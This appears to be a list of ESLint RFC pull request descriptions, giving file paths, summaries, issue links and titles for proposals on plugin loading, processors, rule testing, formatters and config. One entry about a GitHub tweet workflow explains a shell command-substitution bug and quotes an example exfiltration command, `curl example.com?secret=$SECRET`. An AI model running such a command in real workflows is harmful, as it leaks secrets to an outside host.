designs/2018-processors-improvements/README.md
This proposal provides a way to explicitly define which processor(s) to use for different files inside of configuration. It also allows the chaining of multiple processors to fully process a file.
* https://github.com/eslint/eslint/issues/11035
=> New: Processor improvements

designs/2018-simplified-package-loading/README.md
This change would update ESLint to load plugins relative to the user's project root, and other packages relative to where they're specified in a config. This would simplify ESLint's package-loading, resulting in fewer confusing errors about missing packages. It would also fix an existing design bug where ESLint would sometimes fail to load plugins in valid setups.
* [eslint/eslint#10125](https://github.com/eslint/eslint/issues/10125)
* [eslint/rfcs#5](https://github.com/eslint/rfcs/pull/5)
* [eslint/eslint#3458](https://github.com/eslint/eslint/issues/3458)
* [eslint/eslint#6732](https://github.com/eslint/eslint/issues/6732)
* [eslint/eslint#9897](https://github.com/eslint/eslint/issues/9897)
* [eslint/eslint#10643](https://github.com/eslint/eslint/issues/10643)
=> New: Simplify the resolution of third-party plugins/configs/parsers

designs/2019-PassRulesToFormatters/Readme.MD, designs/2019-expose-rules-to-formatters/readme.MD
=> Update: Providing Rule Metadata to Formatters

designs/2019-variable-definition-information-of-config-files/README.md
> Link to [Rendered RFC](https://github.com/eslint/rfcs/blob/2019-variable-definition-information-of-config-files/designs/2019-variable-definition-information-of-config-files/README.md)
This proposal adds variable definition information of config files to `Variable` objects.
- eslint/eslint#11370
=> New: Variable Definition Information of Config Files

designs/2019-plugin-root-path-flag/README.md
With the [2018-simplified-package-loading RFC](https://github.com/eslint/rfcs/blob/8bc0b80e0b3e54d10991a4774c41f7375dfcbbfe/designs/2018-simplified-package-loading/README.md) implemented, ESLint always resolves plugins relative to the current working directory. The CWD works well for the most common use case, but is inconvenient for certain integrations. This RFC proposes adding a CLI flag to specify an alternative place where plugins should be resolved from.
* [#7](https://github.com/eslint/rfcs/pull/7)
* [#14](https://github.com/eslint/rfcs/pull/14)
=> New: Add a flag to specify the folder where plugins are resolved from

designs/2019-recoverable-error-handling/README.md
> Link to [Rendered RFC](https://github.com/eslint/rfcs/blob/handling-recoverable-errors/designs/2019-recoverable-error-handling/README.md).
ESLint cannot verify source code if the code has a syntax error. However, we can make valid AST even if several kinds of syntax errors existed. For example, conflict of variable names doesn't break AST. This RFC calls such a syntax error as <a name="recoverable-errors" href="#recoverable-errors">"Recoverable Errors"</a>.
This RFC adds handling of [Recoverable Errors] into ESLint.
[Recoverable Errors]: #recoverable-errors
- https://github.com/eslint/eslint/issues/3815
- https://github.com/eslint/espree/issues/368
- https://github.com/eslint/eslint/pull/11509#pullrequestreview-220174854
=> New: Recoverable Error Handling

designs/2019-additional-lint-targets/README.md
> [Rendered RFC](https://github.com/eslint/rfcs/blob/2019-additional-lint-targets/designs/2019-additional-lint-targets/README.md)
This was separated from #13. I hope this enhancement to be on ESLint 7.0.0 line.
This proposal adds the ability to specify additional target files into configuration files. This enhancement will solve the pain that people have to use the `--ext` option with wanted file extensions even if they use plugins which support additional file types.
- [eslint/eslint#801](https://github.com/eslint/eslint/issues/801) - Configurable Extension Filter
- [eslint/eslint#1674](https://github.com/eslint/eslint/issues/1674) - Allow setting file extensions in .eslintrc
- [eslint/eslint#2274](https://github.com/eslint/eslint/issues/2274) - Configure file extensions in .eslintrc
- …
=> New: Configuring Additional Lint Targets with `.eslintrc`

designs/2019-processor-shared-settings/README.md
This would add the ability to send options to processors, via a new `processorOptions` object in the `.eslintrc` configuration.
https://gitter.im/eslint/eslint?at=5d0e804ad4535e477a829360
[Here](https://github.com/Conduitry/rfcs/tree/2019-processor-shared-settings/designs/2019-processor-shared-settings)
[Here](https://github.com/eslint/eslint/compare/Conduitry:processorOptions)
=> New: Access to options in processors

designs/2019-suggestions/README.md
This RTC proposes introducing a new mechanism for providing users with suggestions. It's very similar to fixes mechanism that already exists in ESLint, but will provide ability to create multiple suggestions per rule, suggestions will not be automatically applied by using `--fix` flag, and will require user interaction. This feature will only be exposed through the ESLint API, and will not be available on the CLI.
https://github.com/eslint/eslint/issues/7873
https://github.com/eslint/eslint/issues/6733#issuecomment-234656842
=> New: Suggestions

designs/2019-config-tester/README.md
> - [Rendered RFC](https://github.com/eslint/rfcs/blob/2019-config-tester/designs/2019-config-tester/README.md)
> - PoC: `npm i eslint/eslint#config-tester`
Providing `ConfigTester` API that tests shareable configs and plugin's preset configs.
- https://github.com/eslint/eslint/issues/10289
=> New: Config Tester

designs/2019-deprecating-personal-config/README.md
> Link to [rendered RFC](https://github.com/eslint/rfcs/blob/2019-deprecating-personal-config/designs/2019-deprecating-personal-config/README.md)
This RFC deprecates the personal config that is `.eslintrc` files on home directory.
-   https://github.com/eslint/rfcs/pull/7
-   https://github.com/eslint/rfcs/pull/28
-   https://github.com/eslint/eslint/issues/11914
=> Update: Deprecating Personal Config

designs/2019-pass-cwd-from-cli-engine/README.md
Make the CLIEngine `cwd` option available to rules to avoid the misalignment between it and process.cwd()
see: https://github.com/eslint/eslint/issues/11218
https://github.com/eslint/eslint/issues/11218
=> New: Pass cwd from cli engine

designs/2019-description-in-directive-comments/README.md
> Link to [rendered RFC](https://github.com/eslint/rfcs/blob/description-in-directive-comments/designs/2019-description-in-directive-comments/README.md).
This RFC adds the description support into directive comments such as `/*eslint-disable*/`. For example, `/* eslint-disable no-new -- this class has a side-effect in the constructor and it's a library's. */`.
-   https://github.com/eslint/eslint/issues/11806
=> New: Description in directive comments

designs/2019-changing-base-path-in-config-files-that-cli-options-specify/README.md
This RFC changes the base path of `overrides`, `ignorePatterns`, and `.eslintignore` from the directory which contains the config file to the current working directory if the config file was specified by CLI options `--config` or `--ignore-path`.
- https://github.com/eslint/eslint/issues/6759
- https://github.com/eslint/eslint/issues/11558
- https://github.com/eslint/eslint/issues/12278
=> New: Changing Base Path of `overrides` and `ignorePatterns`

designs/2019-drop-node8/README.md
This RFC is for ESLint 7.0.0 (probably we will start to publish alpha in December 2019 or January 2020).
This RFC drops supports for Node.js 8.x and 11.x because of end-of-life. (See [nodejs/release](https://github.com/nodejs/release#readme) to check the release schedule of Node.js)
- https://github.com/eslint/eslint/issues/10981 - Allow use node version >8
- https://github.com/eslint/eslint/issues/11022 - Decide how to manage support for minor versions of Node
=> New: Drop supports for Node.js 8.x and 11.x

designs/2019-esm-compatibilty/README.md
**On Hold: This RFC is on hold until Node unflags ES modules**
JS-based ESLint configurations break when used in an ESM-based package. This RFC documents the specifics outlining the cause of the break as well as a forward-compatible fix.
- ~~eslint/eslint#12319 - ERR_REQUIRE_ESM when requiring .eslintrc.js~~
- eslint/eslint#12321 - Fix: ES module compatibility
- eslint/eslint#12333 - Fix: Load CommonJS .eslintrc.js files within a "type": "module" package scope (fixes #12319)
- nodejs/modules#388 - Transition Path Problems For Tooling
=> New: ES Module Compatibility

designs/2019-plugin-loading-improvement/README.md
> - [Rendered RFC](https://github.com/eslint/rfcs/blob/plugin-loading-improvement/designs/2019-plugin-loading-improvement/README.md)
This RFC changes ESLint to load plugins from the directory of the config files, so it fixes "plugin not found" errors for varied environments.
- https://github.com/eslint/eslint/pull/11696 - New: add `--resolve-plugins-relative-to` flag
- https://github.com/eslint/eslint/issues/12019 - Allow to specify plugin resolution in config
- https://github.com/microsoft/vscode-eslint/issues/696 - ESLint fails to load plugins when using ESLint 6.x
- https://github.com/microsoft/vscode-eslint/issues/708 - Autodetect and propose working directories in mono repositories
- https://github.com/eslint/rfcs/pull/39 - New: Changing the Default Value of …
=> New: Plugin Loading Improvement

designs/2019-move-to-async-api/README.md
- [Rendered RFC](https://github.com/eslint/rfcs/blob/move-to-async-api/designs/2019-move-to-async-api/README.md)
- ~~Blocked by #44.~~ (merged)
~~This RFC changes the methods of `CLIEngine` class as returning `Promise` and adds `CLIEngineSync` class for soft-migration.~~
This RFC adds a new class `LinterShell` that provides asynchronous API and deprecates `CLIEngine`.
- https://github.com/eslint/eslint/issues/1098 - Show results for each file as eslint is running
- https://github.com/eslint/eslint/issues/3565 - Lint multiple files in parallel
- https://github.com/eslint/eslint/issues/10272 - Validate options passed to CLIEngine API
- https://github.com/eslint/eslint/issues/10606 - Make CLIEngine and supporting functions async via Promises
- https://github.com/eslint/eslint/issues/12319 - …
=> New: `ESLint` Class Replacing `CLIEngine`

designs/2019-update-default-ignore-patterns/README.md
This proposal changes the default ignore patterns to include the `node_modules` of subdirectories and to exclude `.eslintrc.js`.
- https://github.com/eslint/eslint/issues/1163 - ignore node_modules folder by default
- https://github.com/eslint/eslint/issues/10089 - .babelrc.js should not be ignored by default
- https://github.com/eslint/eslint/issues/10341 - do not ignore files started with `.` by default
=> New: Update Default Ignore Patterns

templates/design.md
<del>
Presently it is hard to say what rfcs has been implemented. To better track the implementation, the PR update the rfc lifecycle:
1. "Approval" label means consensus has been reached;
2. "merged" means its implementation has been merged to ESLint codebase;
or we can add the  PR link of implementation to every rfc ?
</del>
=>   Docs: add repo info in template file

.github/workflows/tweet-rfc-update.yml
This workflow *should* tweet out an update whenever an RFC moves into "Initial Commenting" or "Final Commenting".
I say "should" because it's impossible to test before merging. Hopefully everything is correct!
=> Chore: Tweet out RFC phase changes

designs/2020-cwd-in-formatters/README.md
> [Rendered RFC](https://github.com/eslint/rfcs/blob/cwd-in-formatters/designs/2020-cwd-in-formatters/README.md)
This RFC lets formatters can access `cwd` in order to make relative paths or do something like.
- https://github.com/eslint/eslint/issues/13376 - Output relative paths rather than absolute paths
=> Accessing `cwd` from formatters

.github/workflows/tweet-rfc-update.yml
This fixes the tweet behavior in this repo based on the new `pull_request_target` event GitHub just introduced. This will allow the tweeting to work correctly.
I also added a tweet for when a pull request is merged. 
This hopefully means we won't need to do any manual tweeting when RFCs change states. :tada:
=> Update: Tweet actions for RFCs

designs/2020-cache-contents-option/README.md
This RFC proposes improving cache for CI by providing an option to use a hash (instead of `mtime` and `fsize`) comparison to determine whether a file has changed.
- https://github.com/eslint/eslint/issues/11319 
- https://github.com/eslint/eslint/issues/11490 
- https://github.com/eslint/eslint/pull/11487
- https://github.com/royriojas/file-entry-cache/pull/14
=> New: Add option to allow use of file contents for cache

designs/2020-timing-list-size/README.md
Running `TIMING=1 eslint` from the command-line outputs a list of [per-rule performance metrics](https://eslint.org/docs/developer-guide/working-with-rules#per-rule-performance-1). The list is currently limited to the top 10 longest-running rules. We would like to enable users to see a longer list of rules if desired.
It was difficult choosing between the recommended design (reusing the `TIMING` variable) and Alternative A (adding a new `TIMING_LIMIT` variable). Interested to hear which one people prefer.
https://github.com/eslint/eslint/issues/13671
=> New: Configurable List Size For Per-Rule Performance Metrics

.github/workflows/tweet-rfc-update.yml
RFC #73 originally included backticks around `` `only` ``. The automated tweet omitted "only" and its backticks. I realized that the `run` action command was using double quotes, so the backticks from the PR title were being interpreted by the shell as command substitution. Using single quotes disables any interpolation.
Thankfully only contributors can trigger the automated tweet by labeling or merging an RFC, and we'd notice something like `curl example.com?secret=$SECRET`, so this isn't really a security issue.
=> Chore: Use non-interpolating single quotes in Tweet action

designs/2020-rule-tester-only/README.md
`RuleTester` currently lacks a built-in way for developers to isolate individual tests during development. Temporarily deleting or commenting out the other tests is tedious. This adds an optional `only` property to run individual tests in isolation.
This was suggested as an alternative solution to [RFC67](https://github.com/eslint/rfcs/pull/67) and [eslint/eslint#13625](https://github.com/eslint/eslint/issues/13625) because that change may not be possible as currently described.
=> New: RuleTester test isolation with only

designs/2020-es-module-support/README.md
Provide an ecmascript module for espree.
https://github.com/eslint/espree/issues/457
=> New: Provide ESM package for Espree

designs/2021-break-on-parsing-errors/README.md
The suggested change is for ESLint to support a parameter that will break the ESLint run when it finds configuration errors. The option will be an opt-in argument called `--break-on-error`.
https://github.com/eslint/eslint/issues/13711
=> New: Break on parsing errors

designs/2021-fixable-disable-directives/design.md
Inline disable directives such as `/* eslint-disable */` that do not suppress any violations may be detected with the `--report-unused-disable-directives` CLI option, but there is no way to automatically remove those comments.
This RFC proposes adding removal of those directives to the `--fix` CLI option as a new [`--fix-type`](https://eslint.org/docs/user-guide/command-line-interface#-fix-type): _**`directive`**_.
- [eslint/eslint#10334](https://github.com/eslint/eslint/issues/10334) - Report an error for eslint-disable-line comments that span multiple lines #1033)
- [eslint/eslint#9249](https://github.com/eslint/eslint/issues/9249) - Add CLI option to report unused eslint-disable directives
- [eslint/eslint#11815](https://github.com/eslint/eslint/issues/11815) - …
=> New: Fixable Disable Directives

designs/2021-init-command-eslint-cli/README.md
rendered: https://github.com/aladdin-add/rfcs/tree/init-command-eslint-cli/designs/2021-init-command-eslint-cli
- Move the `init` command from main repo ([eslint](https://github.com/eslint/eslint)) to a new repo named `@eslint/create-config`.
- Remove the auto-config.
this is following https://github.com/eslint/rfcs/pull/58
=> Update: separate eslint --init

designs/2021-package-exports/README.md
Node.js 12 introduced the ability to strictly define [package exports](https://nodejs.org/api/packages.html#packages_exports) that ensure internal package modules cannot be accessed externally. This RFC proposes implementing package exports for the `eslint` package to prevent unexpected use of internal modules.
https://github.com/eslint/eslint/issues/13654
=> Breaking: Strict package exports

.github/workflows/tweet-rfc-update.yml
Update the `setup-node` action to `v2` for CI.
Use node LTS version (v16) for jobs on CI.
None
=> ci: use `setup-node@v2` and node `v16`

designs/2021-schema-object-rules/README.md
We propose two changes to rules:
- Requiring rules with options to specify schemas (removing support for rules with options that are missing schemas)
- Requiring rule implementations to use the object-style format (removing support for the deprecated function-style format)
- Deprecation warnings when running rule tests: https://github.com/bmish/eslint/tree/RFC-85-deprecation-warning
* https://github.com/eslint/eslint/issues/14709
=> feat!: Require schemas and object-style rules

designs/2021-stricter-rule-test-validation/README.md
We will add additional assertions to the rule test runner to address several potential points of poor test coverage, especially related to [rule suggestions](https://eslint.org/docs/developer-guide/working-with-rules#providing-suggestions).
Assertions added to invalid test case error objects:
- Must contain `suggestions` if the test case produces suggestions
- Must contain the violation message (`message` or `messageId`, but not both)
Assertions added to invalid test case suggestion objects:
- Must contain the suggestion code `output`
- Must contain the suggestion message (`messageId` or `desc`, but not both)
- The suggestion code `output` must differ from the test case `code`
Assertions added to all test cases:
- Any autofix `output` must differ from the test case `code`
- Cannot have …
=> feat!: Stricter rule test validation

designs/2022-community-eslint-org/README.md
Facilitate a GitHub organization (eg. @eslint-community) where community members can help ensure widely depended upon ESLint related packages stay up to date with newer ESLint releases and doesn't hold the wider community back.
This was originally put together in https://github.com/eslint/eslint/discussions/15929#discussioncomment-2850710
- https://github.com/eslint/eslint/issues/15383
- https://github.com/eslint/eslint/discussions/15929
- https://github.com/mysticatea/eslint-plugin/pull/29#issuecomment-1139495904
- https://github.com/standard/eslint-config-standard/issues/192#issuecomment-1000279972
- https://github.com/weiran-zsd/eslint-plugin-node/issues/8
---
Rendered version: https://github.com/MichaelDeBoey/rfcs/blob/patch-1/designs/2022-community-eslint-org/README.md
=> feat: create eslint-community GitHub organization

.github/workflows/tweet-rfc-update.yml
This update our tweet functionality so it only tweets out a merged pull request if one of the labels is "Final Commenting". This will prevent tweets for PRs like this one, that aren't RFCs but will be merged into the repo just the same.
=> build: Update tweet functionality

designs/2022-docs-information-architecture-update/README.md
This document contains proposed changes to the information architecture in the ESLint documentation website, <https://eslint.org/docs>.
On a high level, the proposed information architecture breaks the content into the following sections:
- Use ESLint in Your Project: A refactor of the current [User Guide](https://eslint.org/docs/latest/user-guide/)
- Extend ESLint: A refactor of the current [Developer Guide](https://eslint.org/docs/latest/developer-guide/), with some content moved to the section Maintain ESLint and Community Contributions
- Maintain ESLint: Expansion of current [Maintainer Guide](https://eslint.org/docs/latest/maintainer-guide/), with some content taken from the current ‘Developer Guide’.
- Community Contributions: Expansion of the current [Contributing …
=> docs!: Docs information architecture refactor

designs/2022-suggestion-parse-errors/README.md
Check for parsing errors in suggestion fixes when running rule tests, the same way we do with rule autofix output.
* https://github.com/eslint/eslint/issues/15735 - issue triggering the RFC
* https://github.com/eslint/eslint/pull/16639 - draft implementation
* https://github.com/eslint/rfcs/pull/30 - original suggestions RFC
=> feat!: check for parsing errors in suggestion fixes

designs/2023-test-rule-errors/README.md
Enable rule authors to write unit tests for invalid rule schemas and runtime exceptions in rules.
- https://github.com/eslint/eslint/issues/13434 - the issue triggering this RFC
- https://github.com/eslint/eslint/pull/16823 - draft implementation
=> feat: support for testing invalid rule schemas and runtime exceptions

.github/workflows/tweet-rfc-update.yml
This enables us to post status updates to Mastodon in addition to Twitter because moa.party no longer works for cross posting.
=> chore: Add Mastodon status post to workflow

designs/2023-only-run-reporting-rules/README.md
Currently, ESLint will run all rules that are not marked as `off` in the configuration.
This RFC proposes adding a way to configure which rules are actually run, to reduce linting
time and better match the reporting outcome. Currently, when a rule is marked as `warn`,
ESLint will still run the rule but not report the results when run under `--quiet`. The
intended outcome of this RFC is to allow users to not run these rules when unnecessary.
I have a very rough test implementation patch here, https://gist.github.com/me4502/e75e4677d3ff17ad585fcab0ac5dc6e9. It is missing a few things and is not very clean, but was done to assist in writing the design details of the RFC itself.
https://github.com/eslint/eslint/issues/16450
=> feat!: skip warnings cli flag

designs/2022-unused-disable-directive-flexible-config/README.md
Provide users with more flexible, intuitive control over how unused disable directives are reported by supporting severity levels instead of just boolean values with CLI and config file options. Change the default behavior from off to warn on unused disable directives.
Draft implementation of phase 1 of this RFC (the non-breaking changes):
* https://github.com/eslint/eslint/pull/17212
The issue triggering this RFC:
- <https://github.com/eslint/eslint/issues/15466> - the issue triggering this RFC
Other related issues:
- <https://github.com/eslint/eslint/issues/9382> - similar earlier proposal with `reportUnusedDisableDirectives` accepting a severity level
- <https://github.com/eslint/rfcs/pull/22> - previous RFC to allow `reportUnusedDisableDirectives` in config files
- …
=> feat!: flexible config + default reporting of unused disable directives

designs/2024-report-unused-configs/README.md, designs/2024-report-unused-inline-configs/README.md
Proposes adding a CLI option to report `/* eslint... */` comments that don't change any settings.
* https://github.com/eslint/eslint/issues/15476
* https://github.com/eslint/eslint/issues/18230
=> feat: Reporting unused inline configs

designs/2024-hooks-for-test-cases/README.md
I propose adding an optional  ~~setup~~ `before` (and `after`) properties to the test cases that the ESLint `RuleTester` runs. This
feature will allow developers to prepare specific environments needed for certain rules before running each test case.
- Prior issue: https://github.com/eslint/eslint/issues/18770
- Draft implementation PR: https://github.com/eslint/eslint/pull/18771
=> feat: Hooks for test cases

designs/2024-deprecated-rule-metadata/README.md
This is a continuation of #116 by @bmish to specify additional properties for rule deprecations.
The main changes are:
- move all properties under `meta.deprecated` and deprecate `meta.replacedBy`
- "shorthands" for properties
- additional properties: `kind`, `deprecatedSince`, `availableUntil` 
- more open questions
> * [Change Request: Support additional rule metadata for deprecations eslint#18061](https://github.com/eslint/eslint/issues/18061)
=> feat: additional rule metadata for deprecations

designs/2024-config-extends/README.md
This RFC proposes adding an `extends` key to flat config in order to make it easier to mix and match other configs.
https://github.com/eslint/eslint/issues/19116
=> feat: Flat config extends

designs/2025-rule-languages/README.md
This RFC proposes adding metadata to ESLint rules that indicate which programming languages and language dialects they support. This will enable better documentation and runtime capabilities for ESLint when working with multiple languages.
Refs https://github.com/eslint/eslint/issues/19462
=> feat: Allow rules to specify languages they work on

designs/2025-css-vars-tracking/README.md
This RFC proposes to add capabilities to `CSSSourceCode` to track CSS custom properties (also known as CSS variables). This includes identifying where custom properties are defined and where they are used, as well as providing a way to retrieve the value of a custom property at a specific location in the code.
refs https://github.com/eslint/css/issues/160
=> feat: CSS variable tracking
